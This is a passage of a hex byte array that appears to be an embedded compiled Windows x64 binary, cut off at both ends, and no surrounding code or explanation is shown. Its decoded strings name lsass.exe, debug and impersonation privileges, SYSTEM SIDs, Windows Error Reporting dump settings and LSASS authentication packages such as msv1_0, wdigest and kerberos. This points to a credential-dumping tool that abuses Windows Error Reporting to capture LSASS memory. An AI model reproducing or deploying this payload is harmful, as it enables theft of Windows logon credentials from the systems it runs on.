81,0x78,0x18,0x0B,0x02,0x75,0xEF,0x48,0x29,0xD1,0x45,0x0F,0xB7,0x48,0x06,0x41,0x0F,0xB7,0x50,0x14,0x49,0x8D,0x54,0x10,0x18,0x66,0x45,0x85,0xC9,0x74,0xD7,0x41,0x8D,0x41,0xFF,0x48,0x8D,0x04,0x80,0x4C,0x8D,0x4C,0xC2,0x28,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x42,0x0C,0x4C,0x89,0xC0,0x4C,0x39,0xC1,0x72,0x08,0x03,0x42,0x08,0x48,0x39,0xC1,0x72,0x0C,0x48,0x83,0xC2,0x28,0x4C,0x39,0xCA,0x75,0xE3,0x31,0xC0,0xC3,0x8B,0x42,0x24,0xF7,0xD0,0xC1,0xE8,0x1F,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x4C,0x8B,0x1D,0xC9,0x2C,0x00,0x00,0x45,0x31,0xC0,0x66,0x41,0x81,0x3B,0x4D,0x5A,0x41,0x89,0xCA,0x75,0x0F,0x49,0x63,0x4B,0x3C,0x4C,0x01,0xD9,0x81,0x39,0x50,0x45,0x00,0x00,0x74,0x0C,0x4C,0x89,0xC0,0xC3,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x66,0x81,0x79,0x18,0x0B,0x02,0x75,0xEC,0x8B,0x81,0x90,0x00,0x00,0x00,0x85,0xC0,0x74,0xE2,0x0F,0xB7,0x51,0x14,0x44,0x0F,0xB7,0x49,0x06,0x48,0x8D,0x54,0x11,0x18,0x66,0x45,0x85,0xC9,0x74,0xCE,0x41,0x8D,0x49,0xFF,0x48,0x8D,0x0C,0x89,0x4C,0x8D,0x4C,0xCA,0x28,0x0F,0x1F,0x44,0x00,0x00,0x44,0x8B,0x42,0x0C,0x4C,0x89,0xC1,0x4C,0x39,0xC0,0x72,0x08,0x03,0x4A,0x08,0x48,0x39,0xC8,0x72,0x14,0x48,0x83,0xC2,0x28,0x49,0x39,0xD1,0x75,0xE3,0x45,0x31,0xC0,0x4C,0x89,0xC0,0xC3,0x0F,0x1F,0x40,0x00,0x4C,0x01,0xD8,0xEB,0x0B,0x0F,0x1F,0x00,0x41,0x83,0xEA,0x01,0x48,0x83,0xC0,0x14,0x8B,0x48,0x04,0x85,0xC9,0x75,0x07,0x8B,0x50,0x0C,0x85,0xD2,0x74,0xD7,0x45,0x85,0xD2,0x7F,0xE5,0x44,0x8B,0x40,0x0C,0x4D,0x01,0xD8,0x4C,0x89,0xC0,0xC3,0x90,0x90,0xDB,0xE3,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x51,0x50,0x48,0x3D,0x00,0x10,0x00,0x00,0x48,0x8D,0x4C,0x24,0x18,0x72,0x19,0x48,0x81,0xE9,0x00,0x10,0x00,0x00,0x48,0x83,0x09,0x00,0x48,0x2D,0x00,0x10,0x00,0x00,0x48,0x3D,0x00,0x10,0x00,0x00,0x77,0xE7,0x48,0x29,0xC1,0x48,0x83,0x09,0x00,0x58,0x59,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xB8,0x01,0x00,0x00,0x00,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x45,0x31,0xC0,0x48,0x89,0xC8,0x48,0x85,0xD2,0x75,0x14,0xEB,0x17,0x0F,0x1F,0x00,0x48,0x83,0xC0,0x01,0x49,0x89,0xC0,0x49,0x29,0xC8,0x49,0x39,0xD0,0x73,0x05,0x80,0x38,0x00,0x75,0xEC,0x4C,0x89,0xC0,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x45,0x31,0xC0,0x48,0x89,0xD0,0x48,0x85,0xD2,0x75,0x0E,0xEB,0x17,0x0F,0x1F,0x00,0x49,0x83,0xC0,0x01,0x4C,0x39,0xC0,0x74,0x0B,0x66,0x42,0x83,0x3C,0x41,0x00,0x75,0xEF,0x4C,0x89,0xC0,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x89,0xCB,0xE8,0x8E,0x01,0x00,0x00,0x89,0xD9,0x48,0x8D,0x14,0x49,0x48,0xC1,0xE2,0x04,0x48,0x01,0xD0,0x48,0x83,0xC4,0x28,0x5B,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x48,0x85,0xC9,0x74,0x12,0x66,0x0F,0xEF,0xC0,0x31,0xC0,0x48,0xC7,0x41,0x10,0x00,0x00,0x00,0x00,0x0F,0x11,0x01,0xC3,0xB8,0xFF,0xFF,0xFF,0xFF,0xC3,0x0F,0x1F,0x00,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCB,0x48,0x89,0xD7,0x48,0x85,0xC9,0x0F,0x84,0xB2,0x00,0x00,0x00,0xB9,0x08,0x00,0x00,0x00,0xE8,0x40,0x01,0x00,0x00,0x48,0x83,0x3B,0x00,0x74,0x6A,0x48,0x8B,0x53,0x08,0x48,0x8B,0x43,0x10,0x48,0x39,0xC2,0x74,0x25,0x48,0x8D,0x42,0x08,0xB9,0x08,0x00,0x00,0x00,0x48,0x89,0x43,0x08,0x48,0x89,0x3A,0xE8,0x28,0x01,0x00,0x00,0x31,0xC0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5F,0x41,0x5C,0x5D,0xC3,0x0F,0x1F,0x00,0x48,0x8B,0x0B,0x48,0x89,0xD6,0x48,0x29,0xCE,0x49,0x89,0xF4,0x49,0xC1,0xFC,0x03,0x49,0xC1,0xE4,0x04,0x4C,0x89,0xE2,0xE8,0x54,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x45,0x48,0x89,0x03,0x48,0x8D,0x14,0x30,0x4C,0x01,0xE0,0x48,0x89,0x43,0x10,0xEB,0xAA,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0xB9,0x20,0x00,0x00,0x00,0xE8,0xE9,0x00,0x00,0x00,0x48,0x89,0x03,0x48,0x89,0xC2,0x48,0x85,0xC0,0x74,0x14,0x48,0x89,0x43,0x08,0x48,0x8D,0x80,0x00,0x01,0x00,0x00,0x48,0x89,0x43,0x10,0xE9,0x70,0xFF,0xFF,0xFF,0xB9,0x08,0x00,0x00,0x00,0xE8,0xA8,0x00,0x00,0x00,0x83,0xC8,0xFF,0xE9,0x7A,0xFF,0xFF,0xFF,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCF,0xB9,0x08,0x00,0x00,0x00,0xE8,0x6E,0x00,0x00,0x00,0x48,0x8B,0x37,0x66,0x0F,0xEF,0xC0,0x48,0x8B,0x5F,0x08,0x48,0xC7,0x47,0x10,0x00,0x00,0x00,0x00,0xB9,0x08,0x00,0x00,0x00,0x0F,0x11,0x07,0xE8,0x5E,0x00,0x00,0x00,0x48,0x85,0xF6,0x74,0x24,0x48,0x83,0xEB,0x08,0x48,0x39,0xF3,0x72,0x13,0x48,0x8B,0x03,0x48,0x85,0xC0,0x74,0xEF,0xFF,0xD0,0x48,0x83,0xEB,0x08,0x48,0x39,0xF3,0x73,0xED,0x48,0x89,0xF1,0xE8,0x55,0x00,0x00,0x00,0x31,0xC0,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x92,0x00,0x00,0x90,0x90,0xFF,0x25,0x42,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0x32,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0x22,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0x12,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0x02,0x91,0x00,0x00,0x90,0x90,0xFF,0x25,0xF2,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0xD2,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0xC2,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0xB2,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0xA2,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0x92,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0x82,0x90,0x00,0x00,0x90,0x90,0xFF,0x25,0x72,0x90,0x00,0x00,0x90,0x90,0xE9,0x2B,0x22,0xFF,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x40,0xF1,0xAD,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0xF1,0xAD,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0xEE,0xAD,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0xEF,0xAD,0x68,0x03,0x00,0x00,0x00,0x90,0xEE,0xAD,0x68,0x03,0x00,0x00,0x00,0x70,0xEE,0xAD,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x49,0x64,0x54,0x6F,0x53,0x65,0x73,0x73,0x69,0x6F,0x6E,0x49,0x64,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x42,0x00,0x61,0x00,0x73,0x00,0x65,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x48,0xFF,0x15,0x00,0x78,0x78,0x78,0x00,0x42,0x61,0x73,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x6E,0x69,0x74,0x54,0x68,0x75,0x6E,0x6B,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x48,0x8B,0xC2,0xFF,0x15,0x24,0xCC,0x06,0x00,0x8B,0x00,0x78,0x3F,0x3F,0x78,0x3F,0x3F,0x3F,0x3F,0x3F,0x78,0x00,0x52,0x74,0x6C,0x55,0x73,0x65,0x72,0x54,0x68,0x72,0x65,0x61,0x64,0x53,0x74,0x61,0x72,0x74,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0xFF,0x00,0x78,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5C,0x00,0x52,0x00,0x65,0x00,0x67,0x00,0x69,0x00,0x73,0x00,0x74,0x00,0x72,0x00,0x79,0x00,0x5C,0x00,0x4D,0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x69,0x00,0x6E,0x00,0x65,0x00,0x5C,0x00,0x53,0x00,0x6F,0x00,0x66,0x00,0x74,0x00,0x77,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x5C,0x00,0x4D,0x00,0x69,0x00,0x63,0x00,0x72,0x00,0x6F,0x00,0x73,0x00,0x6F,0x00,0x66,0x00,0x74,0x00,0x5C,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,0x00,0x77,0x00,0x73,0x00,0x5C,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,0x00,0x77,0x00,0x73,0x00,0x20,0x00,0x45,0x00,0x72,0x00,0x72,0x00,0x6F,0x00,0x72,0x00,0x20,0x00,0x52,0x00,0x65,0x00,0x70,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x69,0x00,0x6E,0x00,0x67,0x00,0x5C,0x00,0x4C,0x00,0x6F,0x00,0x63,0x00,0x61,0x00,0x6C,0x00,0x44,0x00,0x75,0x00,0x6D,0x00,0x70,0x00,0x73,0x00,0x5C,0x00,0x00,0x00,0x44,0x00,0x75,0x00,0x6D,0x00,0x70,0x00,0x54,0x00,0x79,0x00,0x70,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5C,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x4F,0x00,0x62,0x00,0x6A,0x00,0x65,0x00,0x63,0x00,0x74,0x00,0x73,0x00,0x5C,0x00,0x53,0x00,0x79,0x00,0x73,0x00,0x74,0x00,0x65,0x00,0x6D,0x00,0x45,0x00,0x72,0x00,0x72,0x00,0x6F,0x00,0x72,0x00,0x50,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x52,0x00,0x65,0x00,0x61,0x00,0x64,0x00,0x79,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5C,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,0x00,0x77,0x00,0x73,0x00,0x45,0x00,0x72,0x00,0x72,0x00,0x6F,0x00,0x72,0x00,0x52,0x00,0x65,0x00,0x70,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x69,0x00,0x6E,0x00,0x67,0x00,0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x50,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x5C,0x00,0x4B,0x00,0x6E,0x00,0x6F,0x00,0x77,0x00,0x6E,0x00,0x44,0x00,0x6C,0x00,0x6C,0x00,0x73,0x00,0x5C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4C,0x00,0x6F,0x00,0x63,0x00,0x61,0x00,0x6C,0x00,0x41,0x00,0x70,0x00,0x70,0x00,0x44,0x00,0x61,0x00,0x74,0x00,0x61,0x00,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x5C,0x00,0x3F,0x00,0x3F,0x00,0x5C,0x00,0x00,0x00,0x5C,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x73,0x00,0x2E,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x54,0x00,0x6F,0x00,0x6B,0x00,0x65,0x00,0x6E,0x00,0x00,0x00,0x50,0x00,0x72,0x00,0x6F,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x00,0x00,0x44,0x00,0x69,0x00,0x72,0x00,0x65,0x00,0x63,0x00,0x74,0x00,0x6F,0x00,0x72,0x00,0x79,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x44,0x00,0x65,0x00,0x62,0x00,0x75,0x00,0x67,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x49,0x00,0x6D,0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x6F,0x00,0x6E,0x00,0x61,0x00,0x74,0x00,0x65,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x41,0x00,0x73,0x00,0x73,0x00,0x69,0x00,0x67,0x00,0x6E,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x6D,0x00,0x61,0x00,0x72,0x00,0x79,0x00,0x54,0x00,0x6F,0x00,0x6B,0x00,0x65,0x00,0x6E,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x53,0x00,0x2D,0x00,0x31,0x00,0x2D,0x00,0x35,0x00,0x2D,0x00,0x31,0x00,0x38,0x00,0x00,0x00,0x53,0x00,0x2D,0x00,0x31,0x00,0x2D,0x00,0x35,0x00,0x2D,0x00,0x31,0x00,0x39,0x00,0x00,0x00,0x5C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x49,0x00,0x6D,0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x6F,0x00,0x6E,0x00,0x61,0x00,0x74,0x00,0x65,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x44,0x00,0x65,0x00,0x62,0x00,0x75,0x00,0x67,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6D,0x00,0x73,0x00,0x76,0x00,0x31,0x00,0x5F,0x00,0x30,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x74,0x00,0x73,0x00,0x70,0x00,0x6B,0x00,0x67,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x77,0x00,0x64,0x00,0x69,0x00,0x67,0x00,0x65,0x00,0x73,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6B,0x00,0x65,0x00,0x72,0x00,0x62,0x00,0x65,0x00,0x72,0x00,0x6F,0x00,0x73,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6C,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x64,0x00,0x70,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6B,0x00,0x64,0x00,0x63,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x64,0x00,0x62,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x73,0x00,0x61,0x00,0x6D,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x72,0x00,0x73,0x00,0x61,0x00,0x65,0x00,0x6E,0x00,0x68,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6E,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6E,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x70,0x00,0x72,0x00,0x6F,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x65,0x00,0x76,0x00,0x65,0x00,0x6E,0x00,0x74,0x00,0x6C,0x00,0x6F,0x00,0x67,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x77,0x00,0x65,0x00,0x76,0x00,0x74,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x74,0x00,0x65,0x00,0x72,0x00,0x6D,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x63,0x00,0x6C,0x00,0x6F,0x00,0x75,0x00,0x64,0x00,0x61,0x00,0x70